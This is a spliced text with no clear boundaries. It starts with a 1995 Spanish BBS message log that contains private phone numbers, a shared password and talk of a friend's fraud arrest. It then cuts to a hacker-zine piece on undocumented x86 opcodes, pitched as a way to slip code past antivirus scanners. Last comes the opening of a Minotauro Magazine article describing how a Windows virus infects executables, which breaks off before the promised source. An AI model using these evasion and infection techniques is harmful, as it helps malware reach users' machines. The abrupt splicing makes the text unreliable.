Siguiente mensaje ***# Mens.: 65 De : yuyo A : howard Tema : Fecha: 12/09/1995 10:49:21 sorry por lo de recien pero estoy practicando estaba sin dormir ok saludos y a tu disposicion yuyo #*** Siguiente mensaje ***# Mens.: 66 De : yuyo A : howard Tema : urgente Fecha: 12/09/1995 11:28:34 mira presiono como me decis pero me lo revota desde ya que te agradesco tu cooperacion me esta volviendo loco esto #*** Siguiente mensaje ***# Mens.: 67 De : yuyo A : howard Tema : mira salgo por 5 mtos voy a tomar un fecatel* Fecha: 12/09/1995 11:30:39 #*** Siguiente mensaje ***# Mens.: 68 De : yuyo A : howard Tema : ense;anza Fecha: 12/09/1995 11:43:29 de este sistema ok estoy de nuevo se esta callendo el sistema a cada rato yuyo #*** Siguiente mensaje ***# Mens.: 69 De : yuyo A : daniel@ubik.satlink.net Tema : conferencia Fecha: 12/09/1995 12:11:57 hola daniel como estas cuando puesdas llamame hoy estara en casa bosa apartir de las 17 hs ya que me esta programando esto saludos yuyo/fin #*** Siguiente mensaje ***# Mens.: 70 De : yuyo A : lobonegro Tema : Fecha: 12/09/1995 12:16:13 mira cuando quieras convesar llamame ok yuyo #*** Siguiente mensaje ***# Mens.: 71 De : yuyo A : fernando@ubik.satlink.net Tema : reunion Fecha: 12/09/1995 13:17:11 estimado fernado hoy te espero a eso de las 18 hs para hablar y reprogramar esta maquina que tan gentilmente me ha regalado mp on line saludos yuyo/fin #*** Siguiente mensaje ***# Mens.: 72 De : yuyo A : duracell Tema : Fecha: 12/09/1995 13:34:04 en 10 mts entro en sistema ok chau bybyb #*** Siguiente mensaje ***# Mens.: 73 De : yuyo A : yuyo Tema : provar Fecha: 12/09/1995 15:03:31 hola como te va queria saber como andas saludos yuyo ///////fin #*** Siguiente mensaje ***# Mens.: 74 De : yuyo A : jel Tema : comunicacion Fecha: 12/09/1995 18:24:50 espero que me llames esta noche yuyo #*** Siguiente mensaje ***# Mens.: 75 De : yuyo A : martin@caparros.satlink.net Tema : lo hablado hoy Fecha: 12/09/1995 18:40:36 te confirmo eso viaje pero el costo por tkt es de usd 300/ pesos c/u se cobra el 50por adelantado y el resto al a entrega espero tu respuesta si es posble hoy mejor saludos yuyo/fin #*** Siguiente mensaje ***# Mens.: 76 De : yuyo A : fernando@ubik.satlink.net Tema : personal Fecha: 12/09/1995 20:05:05 lamento mucho la perdida de tu tia trasmite mi pesar a tu familia raul horacio barragan #*** Siguiente mensaje ***# Mens.: 77 De : yuyo A : jel Tema : llamada Fecha: 12/09/1995 21:51:25 pls si podes hoy 12/09/95 llamame al 9626761 #*** Siguiente mensaje ***# Mens.: 78 De : yuyo A : daniel@ubik.satlink.net Tema : fallecimiento tia bonsa Fecha: 13/09/1995 00:05:50 daniel hoy fallecio la tia del bonsa quiciera arreglar con vos para ver que hacer saludos yuyo #*** Siguiente mensaje ***# Mens.: 79 De : yuyo A : dela Tema : x Fecha: 13/09/1995 02:15:22 mira confia en mi pero tampoco puedo darte 100 79e segurida de todos modos manan a te contactare para darte las novedades gracis yuyo p/d pls my telefhono nemer pls top secret ok/ #*** Siguiente mensaje ***# Mens.: 80 De : yuyo A : gianni Tema : Fecha: 13/09/1995 03:28:30 pls si podes llamame al 9640774/9626761 #*** Siguiente mensaje ***# Mens.: 81 De : yuyo A : valonso@mponline.com.ar Tema : agradecimiento Fecha: 13/09/1995 13:35:25 por la presente te agradesco la nota publicada el el nro86 de compu magazine aprovecho para que lo hagas estenso a todo el staff y en especial a alejandro atentamente yuyo raul horacio barragan #*** Siguiente mensaje ***# Mens.: 82 De : yuyo A : duracell Tema : ctc Fecha: 14/09/1995 16:39:43 gracias por sacarme de ese programa .. estaba hasta las mano /ll #*** Siguiente mensaje ***# Mens.: 83 De : yuyo A : elmalo Tema : che no es para tanto no Fecha: 14/09/1995 16:41:39 referente al loibbro cha raul llama via fone a #*** Siguiente mensaje ***# Mens.: 84 De : yuyo A : gianni Tema : comunicacion Fecha: 14/09/1995 16:53:24 gianni cuando puedas llamme a casa che gracias por lo de la maquina como habras visto estoy todo el dia conectadso, me preocupa que no estan llegando los msg de internet ni saliendo tampoco #*** Siguiente mensaje ***# Mens.: 85 De : yuyo A : duracell Tema : conexion Fecha: 14/09/1995 17:01:44 donde estas que no te encuentro yuyo #*** Siguiente mensaje ***# Mens.: 86 De : yuyo A : duracell Tema : conferencia Fecha: 14/09/1995 18:34:56 che cuando te conectes avisame ok ya que hoy estuviste ocupado saludos yuyo #*** Siguiente mensaje ***# Mens.: 87 De : yuyo A : daniel@ubik.satlink.net Tema : feliz cumplanos Fecha: 14/09/1995 18:42:20 daniel que tengas un muy buen dias y fetejes de lo mejor stop nn urg ctc para hablar temas muy impotantes stop cfm viaje a brasil el sun ar 22 hs ezegig hk4 saludos yuyo #*** Siguiente mensaje ***# Mens.: 88 De : yuyo A : vlad Tema : ctc Fecha: 14/09/1995 21:47:36 hola como te va mira cualquier cosa si queres mantenemos una conversacion y lo que nnececites si esta a mi alcance desde ya a vuestra dispocicion saludos yuyo #*** Siguiente mensaje ***# Mens.: 89 De : yuyo A : duracell Tema : estas en el mud Fecha: 14/09/1995 22:29:21 #*** Siguiente mensaje ***# Mens.: 90 De : yuyo A : dela Tema : novia en mvd Fecha: 15/09/1995 00:01:40 /ll chorro che vos me ivas a llamar que paso #*** Siguiente mensaje ***# Mens.: 91 De : yuyo A : vivi Tema : msg Fecha: 15/09/1995 00:32:23 hola perdon hoy por noo enviarte un msg pero no daba a tiempo seguis con gianni bueno nos vemos manna #*** Siguiente mensaje ***# Mens.: 92 De : yuyo A : dela Tema : cfn Fecha: 15/09/1995 00:35:24 llamame manan chau saludos #*** Siguiente mensaje ***# Mens.: 93 De : yuyo A : duracell Tema : saludos Fecha: 15/09/1995 10:56:49 che no saludaste hoy buenos dias #*** Siguiente mensaje ***# Mens.: 94 De : yuyo A : walfav Tema : ctc Fecha: 15/09/1995 11:29:52 hola walter cuando queras hacemos esa reunion con el tema de tomar el cafe con tus amigos ok saludos yuyo #*** Siguiente mensaje ***# Mens.: 95 De : yuyo A : jel Tema : ctc Fecha: 15/09/1995 11:30:49 todabia seguios sin conectarte.!!!!!!! llamame cuando puedas yuyo #*** Siguiente mensaje ***# Mens.: 96 De : yuyo A : walfav Tema : ctc Fecha: 15/09/1995 12:38:08 mira cambie la clave por si la nececitas para enviar internet es 1956 #*** Siguiente mensaje ***# Mens.: 97 De : yuyo A : jfederico Tema : hola Fecha: 15/09/1995 12:39:14 n hola como te va #*** Siguiente mensaje ***# Mens.: 98 De : yuyo A : daniel@ubik.satlink.net Tema : salutaciones Fecha: 15/09/1995 13:26:43 feliz cumple amigo , que lo pases muy bien en el dia de la fecha saludos yuyo #*** Siguiente mensaje ***# Mens.: 99 De : yuyo A : walfav Tema : ctc Fecha: 15/09/1995 13:28:41 che que pasa estas morfando no se como ctc ya que te mando msg y no contestas na da bueno espero pronta respuesta saludos yuyo p/d sabes halgo de arce ya que tambpoco me llama... #*** Siguiente mensaje ***# Mens.: 100 De : yuyo A : fernado@ubik.satelink.net Tema : la palma gerado Fecha: 15/09/1995 14:13:11 mira este chico viaja a entre rios hoy en la noche y quiere verte para que le co nfirmes con el tema del equipo stop el fone de el en baires es01 812 8738 el de concep. del uruguay es 0442 25094/27474 cualquier cosa por favor llamrlo gracias y chauu contesta a veses un msg ok #*** Siguiente mensaje ***# Mens.: 101 De : yuyo A : walfav Tema : urgente Fecha: 15/09/1995 16:24:59 es para comunicar que esta preso marcos en el dto central de policias aparentemente jus de int. 27 fasicficaion de documentos publicos stop estodo lo que se por el momento stop tratare de concceguir maas informacion stop voy por linea privada sto lewr e inf stop yuyo #*** Siguiente mensaje ***# Mens.: 102 De : yuyo A : duracell Tema : donde estas pls Fecha: 15/09/1995 16:40:07 no te encuentro #*** Siguiente mensaje ***# Mens.: 103 De : yuyo A : walfav Tema : marco Fecha: 15/09/1995 16:53:21 hay alguna instruccion para mi pls #*** Siguiente mensaje ***# Mens.: 104 De : yuyo A : walfav Tema : marcos Fecha: 15/09/1995 20:11:09 att cesar reff de a lo conversado a las 19,hs contigo de la detencion de marco vedase me acaba de informar el comisario palacio, que lamentablente lo tiene defraudaci ones y estafas y prevencion de delitos stop ademas con una investigacion de mas de 6 meses que nada se puede hacer por que esta para cumplir dodo que tenia una condicional stop pero me asegura que haran todo lo posible para que sea lo mas suave stop nececito que me llames hoy mismo para que te pueda esplicar algunas c osas mas stop fue detenido en via publica cuando aparente,meente estaban compran do con tarjestas stop hay que avisarle a su madre y ademas tiene en el dertament o un gato y puede que alli este mi documento por que no lo encontraro y no allan aro el domicilio de yrigoyen saludo yuyo #*** Siguiente mensaje ***# Mens.: 105 De : yuyo A : dela Tema : ctc mvd Fecha: 15/09/1995 20:50:09 hace ctc urgente estoy esperando el ctc pls hacelo por que salgo media hora #*** Siguiente mensaje ***# Mens.: 106 De : yuyo A : fernando@ubik.satlink.net Tema : gerado la palma Fecha: 15/09/1995 21:27:57 mira aco de hablar con el padre y quiere que el dia lunes ejecutes la compra de todo el equipamiento ademas que le de 5 horas semanes de estudios yten lo posibl e en ingles stop mucho me gustaria que hables voz con el papa que es el medico d e cabesera de mi padre a los telefonos 0442 25094 particular y sino al consulto rio 0442 27474 para que auede mas formal cordialmente yuyo #*** Siguiente mensaje ***# Mens.: 107 De : yuyo A : dela Tema : mva Fecha: 15/09/1995 22:29:26 llamame cuando puedas #*** Siguiente mensaje ***# Mens.: 108 De : yuyo A : walfav Tema : marcos Fecha: 15/09/1995 22:31:35 resiviste el msg anterior pls dame respuesta por que necesio saber que es lo que quieren que haga a cesar debo llamarlo en 20 mtos y el comisario palasio llamara en una hora pls demen respuesta este es un proble de uds.. yuyo #*** Siguiente mensaje ***# Mens.: 109 De : yuyo A : walfav Tema : marcos Fecha: 15/09/1995 23:42:50 cuando termines de vajar llamame via fone [para habrir sistema ok #*** Siguiente mensaje ***# Mens.: 110 De : yuyo A : walfav Tema : marco Fecha: 15/09/1995 23:49:34 estoy en linea invisible esperando #*** Siguiente mensaje ***# Mens.: 111 De : yuyo A : walfav Tema : marco Fecha: 16/09/1995 02:17:23 [pls si ten alguna novedad llamame antes de viajar #*** Siguiente mensaje ***# Mens.: 112 De : yuyo A : walfav Tema : ctc yuyo hoy Fecha: 16/09/1995 02:51:13 radio mensage 348 9000 pin 1124790 pertenece pico #*** Siguiente mensaje ***# Mens.: 113 De : yuyo A : walfav Tema : marcos Fecha: 16/09/1995 21:10:30 saber si llamo pls comunicame si pudo hablar con arce gracias #*** Siguiente mensaje ***# Mens.: 114 De : yuyo A : jel Tema : contacto Fecha: 16/09/1995 22:20:12 hola julio como estas, espero que bien y bueno pronto soluciones el problema de tu moden saludos de hugo y mio #*** Siguiente mensaje ***# Mens.: 115 De : yuyo A : dela Tema : encuentro Fecha: 16/09/1995 22:25:57 mira lo siento mucho pero saves que tuve un inconveniente y lamentablemente no puede leer los msg hasta esta hora bueno si queres llamame manana y cordinamo s pero recin llego de gira de anoche asi que te imaginas como estoy me voy a dor mei son las 22,30 del sabados saludos yuyo #*** Siguiente mensaje ***# Mens.: 116 De : yuyo A : duracell Tema : viaje a usa Fecha: 16/09/1995 22:27:56 mira acabo de posponer por tres dias el viaje lo pase para el dia martes recien llego de anoche que sali de gira y segui de largo son las 22,30 hs del sabado y palme asi que me voy a dormir saludos yuyo #*** Siguiente mensaje ***# Mens.: 117 De : yuyo A : nora Tema : enviosd de msg Fecha: 16/09/1995 22:29:40 hola nora me podes dejar eun msg como se hace cuando envias un msg y queres sabe r si la otra persona la leyo. desde ya muchas gracias y saludos yuyo #*** Siguiente mensaje ***# Mens.: 118 De : yuyo A : enok Tema : encuentro Fecha: 16/09/1995 22:43:59 lamento lo de tu pierna che que te paso lei recien los msg y dela me comento que no podias ir hoy a la reunion espero que te mejores hoy cuando te salude salia despues del sistema me estaban esperando en la puerta y debia irme... buen fin de semana saludos yuyo sabado 22 45 hs/september 17/95 #*** Siguiente mensaje ***# Mens.: 119 De : yuyo A : duracell Tema : recuperacion Fecha: 17/09/1995 11:46:05 lenta pero segura,voy a almorzar a la costannera y regreso chauy #*** Siguiente mensaje ***# Mens.: 120 De : yuyo A : gianni Tema : hola loco cuando me llamas.. stop estoy aki aun saludos yuyo Fecha: 17/09/1995 12:45:44 #*** Siguiente mensaje ***# Mens.: 121 De : yuyo A : duracell Tema : prueva Fecha: 17/09/1995 14:35:16 de saber como saber que esta leido o no #*** Siguiente mensaje ***# Mens.: 122 De : yuyo A : gianni Tema : llamada Fecha: 17/09/1995 18:06:33 que eslo que pasa gianni, te envio msg a cada rato y ni siquieras los contestas hoy te envie uno con la mejor buena honda y nada y por lo que veo por la maquina lo leistes y no me contetaste ok intentare hablarte el dia lunes a mp o a tu ofisina saludos muy cordialmente yuyo barragan nota 962 6761 964 0744 son de mi casa chau #*** Siguiente mensaje ***# Mens.: 123 De : yuyo A : dela Tema : ctc Fecha: 17/09/1995 18:19:06 cuando estes por entar aviosame yuyo [A[A[A[A[A #*** Siguiente mensaje ***# Mens.: 124 De : yuyo A : elmalo Tema : ctc Fecha: 17/09/1995 18:21:19 espera un poco estoy leyendo msg #*** Siguiente mensaje ***# Mens.: 125 De : yuyo A : elmalo Tema : estas Fecha: 17/09/1995 18:24:32 toidabia estas por alli voy a tu encuentro en diez mitos #*** Siguiente mensaje ***# Mens.: 126 De : yuyo A : duracell Tema : ctc Fecha: 17/09/1995 19:02:20 cuando salgas a la maquina llamame /962 6761 #*** Siguiente mensaje ***# Mens.: 127 De : yuyo A : jagger Tema : ctc Fecha: 17/09/1995 20:57:36 pedazo de forro despues hablamos... con trolo no"">}}}}}{{{{::>>>< AL y AH <-- 00h el ejemplo anterior: (09h * 10d) + 07h --> AL Lo que no esta documentado es que asi como se multiplica por la base del BCD default (10d) se puede modificar por cualquier otra base. Los ensambladores prefijan este valor a 10d (0ah), aunque se puede manejar y verificar a mano. El ejemplo anterior se veria: db 0d5h, 0ah ; aad Si quisieramos trabajar con otra base, digamos hexa seria: db 0d5h, 10h ; aad Y asi sucesivamente... En sintesis, con un opcode de D5h, imm la logica seria: AL = (AH * imm) + AL AH = 00h Como esto, lo mismo pasa con otras instrucciones como SHL, AAM, etc ... Ahora veamos las mas interesantes: =============================================================================== ICEBP In Circuit Emulator Break Point Most 80386+ =============================================================================== 0f1h Para la parte practica, esta instruccion se comporta como un INT 01h de un solo byte. Como tiene un uso no documentado oficialmente los desensambladores y antivirus que analizan el codigo no la reconocen. El mnemonico viene de su funcion original, setear un breakpoint para el ICE (contrariamente con el Intruder Countermeasure Electronics, esta sigla viene de In Circuit Emulator). El tema del ICE es bastante extenso, pero resumidamente es un hard especial que se conecta al sistema (el cual tiene que venir preparado) con funciones de debugging externas. Este hard vendria preparado con memoria Hidden (una memoria que co-existiria con la memoria comun de usuario) la cual solo se podria utilizar desde un modo especial del micro. Este modo se lo conoce como Management Mode, desde el cual se podria acceder a la memoria hidden con instrucciones MOV comun y corrientes. Si desde este modo se necesitaria transferir informacion de la memoria de usuario comun, se haria por medio un UMOV (User MOV). Comunmente no va a haber problemas, ya que como dijimos antes el micro lo interpreta como un INT 01h de un solo byte (pasaria a modo Management, si el bit 12 del DR7 pasara a 1) Aunque esto depende de cada micro y debe ser consultado especificamente si se quiere investigar. En este estado cualquier int 1h, ya sea generado a mano, por un ICEBP o por el trap flag (int 1h) realiza un cambio a Management Mode, por lo que si el sistema no estuviese preparado para soportar hidden memory, o ICE se colgaria. =============================================================================== LOADALL Load All Processor Registers Some 286-486 =============================================================================== 0fh, 05h ; Load Registers from 0:800h 286 only 0fh, 07h ; Load Registers from es:edi 386/486 Esta es una instruccion muy especial. Era usada originalmente por los ICE para poder cargar de un saque y desde una tabla, CADA registro del CPU. Esto nos permitiria cambiar los descriptores de segmento, pudiendo acceder a memoria extendida sin necesidar de switchear a modo protegido. Se que esto se hace, pero yo no lo pude hacer andar... Seguramente no tengo en cuenta alguna otra cosa, no se. Si alguien pudiera :) me avisa :) Este es un extracto de un articulo sobre LOADALL: LOADALL loads the entire CPU state from a table pointed to by ES:EDI. At the completion of LOADALL, the CPU state is defined according to this table. No protection checks are performed against values in the table, and LOADALL can generate no exceptions in real mode, or in protected mode at IOPL 0. Attempting to execute LOADALL at any other privilege level will generate an exception 13. There are three types of structures in the LOADALL image: 1) 32-bit CPU registers entries; 2) 16-bit segment registers (zero-extended to 32-bits); 3) 96-bit segment descriptor cache entries. The segment register entries have the following format: SREG STRUC REG_VAL DW ? ; low 16-bits defined DW 0 ; high 16-bits=0 ENDS The segment descriptor cache entires have the following format: DESC_CACHE STRUC DB 0 ; b[00-07] not used S_USE DB ? ; b[14] operand size S_Access DB ? ; b[16-23] Access Rights DB 0 ; b[24-31] not used S_Addr DD ? ; Segment Address in memory S_Limit DD ? ; Segment size limit ENDS The LOADALL tables is organized as follows: ;---------------------------------------------------------------- ; LOADALL table pointed to by ES:EDI ;---------------------------------------------------------------- Offset Description Size Value ====== =========== ==== ===== [00] CR0 DD ? [04] EFLAGS DD ? [08] EIP DD ? [0C] EDI DD ? [10] ESI DD ? [14] EBP DD ? [18] ESP DD ? [1C] EBX DD ? [20] EDX DD ? [24] ECX DD ? [28] EAX DD ? [2C] DR6 DD ? [30] DR7 DD ? [34] TR_REG SREG [38] LDT_REG SREG [3C] GS_REG SREG [40] FS_REG SREG [44] DS_REG SREG [48] SS_REG SREG [4C] CS_REG SREG [50] ES_REG SREG [54] TSS_DESC DESC_CACHE [60] IDT_DESC DESC_CACHE <0,?,?> [6C] GDT_DESC DESC_CACHE <0,?,?> [78] LDT_DESC DESC_CACHE [84] GS_DESC DESC_CACHE [90] FS_DESC DESC_CACHE [9C] DS_DESC DESC_CACHE [A8] SS_DESC DESC_CACHE [B4] CS_DESC DESC_CACHE [C0] ES_DESC DESC_CACHE [CC] LENGTH OF TABLE The following two diagrams take a closer look at fields within the LOADALL table: 1) the descriptor cache register; 2) the access rights within the descriptor cache register. ;--------------------------------------------------------------------- ; Segment descriptor cache register ; ; 9 6 3 2 1 1 0 0 ; 5 3 1 3 5 3 7 0 ; +--------------+---------------------+---+---------------+---+---+ ; | 32-bit limit | 32-bit base address | 0 | Access Rights | 0 | 0 | ; +--------------+---------------------+---+---------------+---+---+ ; ;--------------------------------------------------------------------- ; 386 Descriptor Cache Access Rights ; ; ++++++++----------------------------- 0=Undefined ; |||||||| +--------------------------- Present 0=No 1=Yes ; |||||||| |++------------------------- Descriptor privelege level ; |||||||| |||+------------------------ System Desc. 0=Sys 1=Code/Data ; |||||||| ||||+++--------------------- Type(*) ; |||||||| ||||||+-----------------------Read/Write 0=R/O 1=R/W ; |||||||| |||||+|-----------------------Expansion 0=Up 1=Dwn ; |||||||| ||||+||-----------------------Executable 0=No 1=Yes* ; |||||||| ||||||| 000=Read Only ; |||||||| ||||||| 001=Read/Write ; |||||||| ||||||| 010=Read Only, Expand down ; |||||||| ||||||| 011=Read/Write, Expand down ; |||||||| ||||||| 100=Execute only ; |||||||| ||||||| 101=Execute/Read ; |||||||| ||||||| 110=Execute only, conforming ; |||||||| ||||||| 111=Execute/Read, conforming ; |||||||| |||||||+-------------------- Accessed ; |||||||| |||||||| +------------------ 0=Undefined (was G bit) ; |||||||| |||||||| |+----------------- Default operand size(+) ; |||||||| |||||||| || 0=16-bit operands ; |||||||| |||||||| || 1=32-bit operands ; |||||||| |||||||| || ; |||||||| |||||||| ||++++++-++++++++-- 0=Undefined ; |||||||| |||||||| |||||||| |||||||| ; |||||||| |||||||| |||||||| |||||||| ; 3||||||||2||||||||1||||||||0||||||||0 Bit ; 1||||||||3||||||||5||||||||7||||||||0 Offset ; +++++++++++++++++++++++++++++++++++++ ; | Intel |22221111|11|Intel| Intel | (*) = CS can be marked as a R/W ; |Reserved|32109876|54|Rsvd.|Reserved| data segment if LOADALL ; +++++++++++++++++++++++++++++++++++++ is used to load register. ; (+) = Only applicable for CS ; ;--------------------------------------------------------------------- ; A closer look at the access rights field definitions: ; ; 2 2 2 2 1 1 1 1 1 1 1 Bit 2 2 2 2 1 1 1 1 1 1 ; 3 2 1 0 9 8 7 6 5 4 3 Offset 3 2 1 0 9 8 7 6 5 4 ; +-+---+-+-----+-+-+-+-+ +-+---+-+-----+-+-+-+ ; |P|DPL|S|Type |A|0|G|D| |P|DPL|S| Type |G|D| ; | | | |0| | | | | | | | | | | |1| | | | | | | ; +-+---+-+-----+-+-+-+-+ +-+---+-+-----+-+-+-+ ; Bit: ; P Present bit. 1=Present, 0=Not present. ; This bit signals the CPU if the segment addressed by the ; segment base address is actually present in memory. ; DPL Descriptor Privilege Level: 0=highest, 3=lowest ; S System descriptor: 0=Code, Data; 1=System descriptor ; Type Segment Type: (S=0) ; +-+-+-+ ; |X|Y|Z| ; +-+-+-+ ; | | | ; | | +-- Read/Write 0=Read-only 1=Read/Write ; | +---- Expansion direction. 0=Expand up 1=Expand down ; +------ Executable 0=Data Seg 1=Code Seg ; Type Segment Type: (S=1) ; 0000 = Reserved ; 0001 = Available 286 TSS ; 0010 = LDT ; 0011 = Busy 286 TSS ; 0100 = 286 Call Gate ; 0101 = Task Gate ; 0110 = 286 Interrupt Gate ; 0111 = 286 Trap Gate ; 1000 = Reserved ; 1001 = Available 386, 486 TSS ; 1010 = Reserved ; 1011 = Busy 386, 486 TSS ; 1100 = 386, 486 Call Gate ; 1101 = Reserved ; 1110 = 386, 486 Interrupt Gate ; 1111 = 386, 486 Trap Gate ; A Accessed (S=0) 0=Not Accessed 1=Accessed ; The processor sets this bit when the descriptor is ; accessed. ; G Granularity 0=Byte 1=4k ; When set, upon loading the limit field of the descriptor ; cache register, the CPU shifts the limit by 12, and fills ; in the 1st 12 bits with 1's as follows: ; SHL LIMIT,12 ; OR LIMIT,0FFFh ; D Default operand size 0=16-bit 1=32-bit ; When set, the CPU interprets all operands, and effective ; addresses as 32-bit values. When clear, all operands ; and effective addresses are 16-bit values. This bit ; is only applicable to the CS descriptor cache. ;--------------------------------------------------------------------- ; The definition of these bits is exactly as that of the access ; rights in the descriptor table, with the following exceptions: ; 1) The "PRESENT" bit becomes a valid bit. Using LOADALL, you ; may load a descriptor cache register whose P bit is marked ; not present (P=0). During normal CPU operaion, simply ; loading the segment selector with a descriptor table entry ; whose P=0 will cause an exception-11. This is different ; that operating with LOADALL. LOADALL will let you load the ; descriptor cache register with P=0. But any memory ; reference using that segment selector will cause exception- ; 13. ; 2) The DPL field for SS & CS descriptors determine the CPL. ; 3) The DPL field for DS, ES, FS, & GS should be 3. ; 4) The Granularity (G) bit has no effect on the limit field ; in the descriptor cache register ; 5) A Code segment (CS) may be Read/Write/Executable by setting ; the access rights as a Read/Write/Data segment. This will ; even work in protected mode. =============================================================================== UMOV User Move Register Instructions Some 386/486 =============================================================================== 0fh, 10h, r/m mov regB1/mem8, regB2 0fh, 11h, r/m mov regW1/memW, regW2 0fh, 12h, r/m mov regB1, regB2/memB 0fh, 13h, r/m mov regW1, regW2/memW Desde el System Managemente Mode (desde ahora SMM) se lo utiliza para traer o llevar datos desde memoria Hidden a memoria de Usuario y viceversa. Pero lo interesante es que si no estamos en el SMM, opera de la misma manera que un MOV con los opcodes del 88h al 8bh. Osea que tenemos una forma de MOV no documentada, por lo que desensambladores y antivirus no reconocen que esta pasando. Para no andar haciendo todo a mano, fijense que el UMOV difiere de un ADC comun por el 0fh de delante. Por lo que pueden dejar que el compilador haga todo el trabajo: UMOV ax, bx --> db 0fh adc ax, bx UMOV al, cl --> db 0fh adc al, cl Nota: No podemos garantizar hasta cuando se va a poder seguir haciendo esto, quizas saquen el opcode, o metan un HALT en su lugar, quien sabe :-) Tengo entendido que en Cyrix, se comporta como un NOP..... fijense y tengan en cuenta que es posible que no funcione en todos lados donde lo prueben. Saludos, Drako, digital anarchy MINOTAURO MAGAZINE #9: Virus For Windows v1.4 Por Trurl // Introducci¢n // Nuestro DEBUG, SOURCER, y dem s herramientas de disecci¢n hab¡an dormido durante demasiado tiempo, as¡ que decidimos desempolvarlas y volver al trabajo bienamado de desensamblado. Pero esto no es todo. Si hici‚ramos una encuesta entre usuarios de computadoras personales, revelar¡a que la mayor¡a de ellos usa alguna versi¢n de Windows en alg£n momento. Tambi‚n nos mostrar¡a que hay cada vez mas computadoras en las que la mayor cantidad de ejecutables corresponde a ejecutables de Windows. La gente que usa Windows ahora es de todos los niveles. No solo usan Windows (como suced¡a hace un cierto tiempo) aquellas personas que en realidad no conocen otra cosa, y creen que Windows es lo £nico que existe. Ahora hay ciertas personas que han ELEGIDO Windows, por sobre otros sistemas como OS/2 (o DOS obviamente). Por lo tanto todo hace pensar que nuestros peores temores se har n realidad; Windows, nos guste o no, es la plataforma de los pr¢ximos a¤os, para la inmensa mayor¡a de la gente. Podr¡amos entrar en la eterna discusi¢n AntiWindows-ProWindows pero no vamos a hacerlo, porque en realidad cada uno de nosotros, los que leemos y escribimos esto en este momento, sabe lo que quiere poner en su maquina, para que, y por que. Lo que nos interesa es el hecho incontrastable de que cada vez mas gente usa Windows. Pero la proporci¢n de virus no se mantiene. Hay poqu¡simos virus de Windows (de hecho, para ser francos, se de la existencia de dos (2), y solo vi y examine uno (1), que es el protagonista de la presente nota). Desco- nozco porque la llamada "comunidad" de autores de virus, que fuera tan activa en el pasado, no hizo nada en todo este tiempo, o porque hay tan poca informaci¢n de Windows dando vuelta por esos canales, en fin, porque no pasa nada. Pero puedo conjeturar varios motivos; El hecho de que funcione en modo protegido ya amedrenta a unos cuantos, conceptos nuevos como task, descrip- tor, memoria lineal, f¡sica, l¢gica, etc, asusta a cualquiera. Luego el mismo hecho de que lo odiemos tanto (a Windows). Y por £ltimo el hecho de que la informaci¢n de bajo nivel de Windows esta muy, muy restringida porque los mismos desarrolladores de Windows no tienen idea como funciona el sistema a bajo nivel (no como suced¡a en DOS) porque ahora tienen herramientas "nuevas y sofisticadas" como el Visual Basic, Delphi, Visual C. Y Windows mismo pone mucho el acento en lo que se denomina "device independence", que consiste en que la interacci¢n entre una aplicaci¢n y el hardware es nula, inexistente, cero. Siempre esta el sistema en el medio, con sus APIs y dem s yerbas. (Eso es lo que hace por ejemplo que no haya tantos juegos, al menos no hasta el advenimiento del DirectX, porque el overhead que significaba llamar al sistema para updatear la pantalla hacia las cosas lent¡simas, no como antes en DOS que directamente se zarandeaba a la placa de video como uno quer¡a). Por lo tanto el resumen es que la informaci¢n a bajo nivel del sistema no interesa a nadie, excepto a los que hacen herramientas de desarrollo para Windows (compiladores, debugers, etc), o cosas afines. Y a nosotros desde luego. Sea como fuere, la informaci¢n existe. Windows es un sistema como cualquier otro, por mas que funcione en modo protegido, y los virus, en principio, deber¡an ser tan posibles en el como en DOS. Por eso para comenzar, y como primera nota de un tema que tenemos intenci¢n de seguir tratando (dentro de nuestras posibilidades), les ofrecemos el desensamblado de este simp tico virus para Windows, que alguien tuvo el buen tino de hacer. No es un gran virus para nada. Funcio- nalmente es un virus mediocre. Es el equivalente a lo que seria un virus runtime en dos (un no-residente), que para colmo no entrega el control al host. Pero es el primer virus de Windows que conocemos que infecta exitosa- mente. Por lo tanto veamos como, y luego les dejo el source del virus. // Como funciona el Virus // Lo primero que notaran al ver el source es que es un EXE, y esta definido con un segmento de c¢digo y uno de datos. Esto se debe a que es necesario que el virus, al infectar (en un host infectado) se cargue con el c¢digo en el segmento de c¢digo (por un lado) y todos los datos y buffers en el segmento de datos (por el otro) porque en modo protegido no se puede escribir (y a veces tampoco leer) de un segmento de c¢digo. Por lo tanto todos los buffers y datos tienen que estar en su propio segmento cuando el virus es cargado en memoria por Windows. Esta es la raz¢n por la que el virus esta hecho as¡. (antes sencillamente pon¡amos todo en el mismo segmento y cuando quer¡amos acceder a un dato seteabamos DS a CS y listo, y gener bamos carriers que eran COM). Notaran adem s que el c¢digo empieza en el offset F9h, pero el virus escribe a partir del offset 100h; los bytes entre F9h y 100h son un c¢digo que inicializa DS, que solo es necesario en el carrier (que esta pensado para correrlo bajo DOS) pero no lo es cuando el virus corre bajo Windows, desde un host. Lo que hace para infectar es sobreescribir el segmento de c¢digo y el segmento de datos del ejecutable que infecta con el c¢digo y los datos del virus, y graba el c¢digo y datos originales al final del file. (es equipa- rable al vetusto y entra¤able Jerusalem). Ahora, como lo hace es bastante complicado. Los segmentos dentro de un ejecutable de Windows est n defini- dos en una estructura que se encuentra dentro del EXE y se llama Segment Table (ver el articulo adjunto en este n£mero sobre la estructura de los EXE de Windows). El offset a la segment table dentro del ejecutable esta en el header del EXE (el NE, nuevo header, no el viejo header de DOS). En esta tabla (la Segment Table) se encuentran datos para cada segmento, como si se trata de un segmento de datos o c¢digo, si es escribible (si es de datos) o si es le¡ble (si es de c¢digo) y el offset, dentro del file, a los datos del segmento (a los contenidos de ese segmento). Entonces el c¢digo, para sobreescribir el segmento de c¢digo del ejecutable que quiere infectar con el c¢digo del virus, debe primero leer el NE, de all¡ conseguir el offset a la Segment Table, y dentro de esta conseguir la entrada correspondiente al segmento de c¢digo (cuyo n£mero de segmento, osea ¡ndice dentro de la Segment Table, esta en el NE), y dentro de esta entrada de la Segment Table consigue el offset de los datos del segmento de c¢digo (osea del sobado y sopapeado CODIGO del programa). Y all¡ es donde sobrescribe. (I hope you got that). Hace lo mismo para el segmento de datos, que sobrescribe con varios datos que necesita el virus. Ahora bien, esto en cuanto a como infecta. La cuesti¢n de retorno del control al host no esta resuelta en el virus. Aparentemente el autor pens¢ que no seria posible, o en todo caso decidi¢ no intentarlo. El virus por lo tanto no retorna el control al host; sencillamente desinfecta el host y termina normalmente via 4C00. Hopefuly, el usuario vuelve a clickear en el icono de la aplicaci¢n, y todo el asunto pasa como un "click en falso". Al volver a correrse la aplicaci¢n, esta est  desinfectada. Obviamente el virus no queda "residente" ni nada 